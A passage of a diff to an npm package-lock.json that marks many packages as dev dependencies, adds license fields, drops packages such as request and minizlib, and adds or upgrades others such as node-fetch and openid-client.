"sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", + "dev": true, "dependencies": { "semver": "^7.5.3" }, @@ -2893,6 +3178,7 @@ "version": "7.6.3", "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, "bin": { "semver": "bin/semver.js" }, @@ -2903,25 +3189,39 @@ "node_modules/make-error": { "version": "1.3.6", "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==" + "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", + "dev": true }, "node_modules/makeerror": { "version": "1.0.12", "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", + "dev": true, "dependencies": { "tmpl": "1.0.5" } }, + "node_modules/math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, "node_modules/merge-stream": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==" + "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", + "dev": true }, "node_modules/micromatch": { "version": "4.0.8", "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", + "dev": true, "dependencies": { "braces": "^3.0.3", "picomatch": "^2.3.1" @@ -2935,6 +3235,7 @@ "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", "dev": true, + "license": "MIT", "engines": { "node": ">= 0.6" } @@ -2944,6 +3245,7 @@ "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "dev": true, + "license": "MIT", "dependencies": { "mime-db": "1.52.0" }, @@ -2955,6 +3257,7 @@ "version": "2.1.0", "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", + "dev": true, "engines": { "node": ">=6" } @@ -2963,6 +3266,7 @@ "version": "3.1.2", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", + "dev": true, "dependencies": { "brace-expansion": "^1.1.7" }, @@ -2970,82 +3274,56 @@ "node": "*" } }, - "node_modules/minipass": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/minizlib": { + "node_modules/ms": { "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", - "dev": true, - "dependencies": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/minizlib/node_modules/minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=8" - } + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true }, - "node_modules/minizlib/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "node_modules/natural-compare": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", + "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", "dev": true }, - "node_modules/mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", + "node_modules/node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", "dev": true, - "bin": { - "mkdirp": "bin/cmd.js" + "license": "MIT", + "dependencies": { + "whatwg-url": "^5.0.0" }, "engines": { - "node": ">=10" + "node": "4.x || >=6.0.0" + }, + "peerDependencies": { + "encoding": "^0.1.0" + }, + "peerDependenciesMeta": { + "encoding": { + "optional": true + } } }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==" - }, "node_modules/node-int64": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==" + "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", + "dev": true }, "node_modules/node-releases": { "version": "2.0.18", "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", - "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==" + "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", + "dev": true }, "node_modules/normalize-path": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", + "dev": true, "engines": { "node": ">=0.10.0" } @@ -3054,6 +3332,7 @@ "version": "4.0.1", "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", + "dev": true, "dependencies": { "path-key": "^3.0.0" }, @@ -3061,39 +3340,21 @@ "node": ">=8" } }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "dev": true, - "engines": { - "node": "*" - } - }, - "node_modules/object-hash": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", - "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", - "dev": true, - "optional": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/oidc-token-hash": { - "version": "5.0.3", - "resolved": "https://registry.npmjs.org/oidc-token-hash/-/oidc-token-hash-5.0.3.tgz", - "integrity": "sha512-IF4PcGgzAr6XXSff26Sk/+P4KZFJVuHAJZj3wgO3vX2bMdNVp/QXTP3P7CEm9V1IdG8lDLY3HhiqpsE/nOwpPw==", + "node_modules/oauth4webapi": { + "version": "3.5.3", + "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.5.3.tgz", + "integrity": "sha512-2bnHosmBLAQpXNBLOvaJMyMkr4Yya5ohE5Q9jqyxiN+aa7GFCzvDN1RRRMrp0NkfqRR2MTaQNkcSUCCjILD9oQ==", "dev": true, - "optional": true, - "engines": { - "node": "^10.13.0 || >=12.0.0" + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/panva" } }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "dev": true, "dependencies": { "wrappy": "1" } @@ -3102,6 +3363,7 @@ "version": "5.1.2", "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", + "dev": true, "dependencies": { "mimic-fn": "^2.1.0" }, @@ -3113,45 +3375,24 @@ } }, "node_modules/openid-client": { - "version": "5.4.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-5.4.3.tgz", - "integrity": "sha512-sVQOvjsT/sbSfYsQI/9liWQGVZH/Pp3rrtlGEwgk/bbHfrUDZ24DN57lAagIwFtuEu+FM9Ev7r85s8S/yPjimQ==", + "version": "6.6.1", + "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.6.1.tgz", + "integrity": "sha512-GmqoICGMI3IyFFjhvXxad8of4QWk2D0tm4vdJkldGm9nw7J3p1f7LPLWgGeFuKuw8HjDVe8Dd8QLGBe0NFvSSg==", "dev": true, - "optional": true, + "license": "MIT", "dependencies": { - "jose": "^4.14.4", - "lru-cache": "^6.0.0", - "object-hash": "^2.2.0", - "oidc-token-hash": "^5.0.3" + "jose": "^6.0.11", + "oauth4webapi": "^3.5.3" }, "funding": { "url": "https://github.com/sponsors/panva" } }, - "node_modules/openid-client/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "optional": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/openid-client/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true, - "optional": true - }, "node_modules/p-limit": { "version": "3.1.0", "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", + "dev": true, "dependencies": { "yocto-queue": "^0.1.0" }, @@ -3166,6 +3407,7 @@ "version": "4.1.0", "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", + "dev": true, "dependencies": { "p-limit": "^2.2.0" }, @@ -3177,6 +3419,7 @@ "version": "2.3.0", "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dev": true, "dependencies": { "p-try": "^2.0.0" }, @@ -3191,6 +3434,7 @@ "version": "2.2.0", "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", + "dev": true, "engines": { "node": ">=6" } @@ -3199,6 +3443,7 @@ "version": "5.2.0", "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", + "dev": true, "dependencies": { "@babel/code-frame": "^7.0.0", "error-ex": "^1.3.1", @@ -3216,6 +3461,7 @@ "version": "4.0.0", "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", + "dev": true, "engines": { "node": ">=8" } @@ -3224,6 +3470,7 @@ "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", + "dev": true, "engines": { "node": ">=0.10.0" } @@ -3232,6 +3479,7 @@ "version": "3.1.1", "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", + "dev": true, "engines": { "node": ">=8" } @@ -3239,23 +3487,20 @@ "node_modules/path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" - }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==", + "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", "dev": true }, "node_modules/picocolors": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", - "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==" + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", + "dev": true }, "node_modules/picomatch": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", + "dev": true, "engines": { "node": ">=8.6" }, @@ -3267,6 +3512,7 @@ "version": "4.0.6", "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", + "dev": true, "engines": { "node": ">= 6" } @@ -3275,6 +3521,7 @@ "version": "4.2.0", "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", + "dev": true, "dependencies": { "find-up": "^4.0.0" }, @@ -3283,10 +3530,11 @@ } }, "node_modules/prettier": { - "version": "3.4.2", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.4.2.tgz", - "integrity": "sha512-e9MewbtFo+Fevyuxn/4rrcDAaq0IYxPGLvObpQjiZBMAzB9IGmzlnG9RZy3FFas+eBMu2vA0CszMeduow5dIuQ==", + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.6.0.tgz", + "integrity": "sha512-ujSB9uXHJKzM/2GBuE0hBOUgC77CN3Bnpqa+g80bkv3T3A93wL/xlzDATHhnhkzifz/UE2SNOvmbTz5hSkDlHw==", "dev": true, + "license": "MIT", "bin": { "prettier": "bin/prettier.cjs" }, @@ -3301,6 +3549,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", + "dev": true, "dependencies": { "@jest/schemas": "^29.6.3", "ansi-styles": "^5.0.0", @@ -3314,6 +3563,7 @@ "version": "5.2.0", "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", + "dev": true, "engines": { "node": ">=10" }, @@ -3325,6 +3575,7 @@ "version": "2.4.2", "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", + "dev": true, "dependencies": { "kleur": "^3.0.3", "sisteransi": "^1.0.5" @@ -3333,25 +3584,22 @@ "node": ">= 6" } }, - "node_modules/psl": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", - "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==", - "dev": true - }, - "node_modules/punycode": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.0.tgz", - "integrity": "sha512-rRV+zQD8tVFys26lAGR9WUuS4iUAngJScM+ZRSKtvl5tKeZ2t5bvdNFdNHBW9FWR4guGHlgmsZ1G7BSm2wTbuA==", + "node_modules/pump": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", + "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", "dev": true, - "engines": { - "node": ">=6" + "license": "MIT", + "dependencies": { + "end-of-stream": "^1.1.0", + "once": "^1.3.1" } }, "node_modules/pure-rand": { "version": "6.1.0", "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", + "dev": true, "funding": [ { "type": "individual", @@ -3363,70 +3611,17 @@ } ] }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "dev": true, - "engines": { - "node": ">=0.6" - } - }, "node_modules/react-is": { "version": "18.2.0", "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==" - }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", - "dev": true, - "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dev": true, - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } + "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", + "dev": true }, "node_modules/require-directory": { "version": "2.1.1", "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", + "dev": true, "engines": { "node": ">=0.10.0" } @@ -3435,6 +3630,7 @@ "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", + "dev": true, "dependencies": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", @@ -3451,6 +3647,7 @@ "version": "3.0.0", "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", + "dev": true, "dependencies": { "resolve-from": "^5.0.0" }, @@ -3462,6 +3659,7 @@ "version": "5.0.0", "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", + "dev": true, "engines": { "node": ">=8" } @@ -3470,6 +3668,7 @@ "version": "2.0.2", "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", + "dev": true, "engines": { "node": ">=10" } @@ -3480,36 +3679,11 @@ "integrity": "sha512-tLOizhR6YGovrEBLatX1sdcuhoSCXddw3mqNVAcKxGJ+J0hFeJ+SjeWCv5UPA/WU3YzWPPuCVYgXBKZUPGpKtg==", "dev": true }, - "node_modules/safe-buffer": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", - "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/feross" - }, - { - "type": "patreon", - "url": "https://www.patreon.com/feross" - }, - { - "type": "consulting", - "url": "https://feross.org/support" - } - ] - }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==", - "dev": true - }, "node_modules/semver": { "version": "6.3.1", "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "dev": true, "bin": { "semver": "bin/semver.js" } @@ -3518,6 +3692,7 @@ "version": "2.0.0", "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "dev": true, "dependencies": { "shebang-regex": "^3.0.0" }, @@ -3529,6 +3704,7 @@ "version": "3.0.0", "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", + "dev": true, "engines": { "node": ">=8" } @@ -3536,25 +3712,70 @@ "node_modules/signal-exit": { "version": "3.0.7", 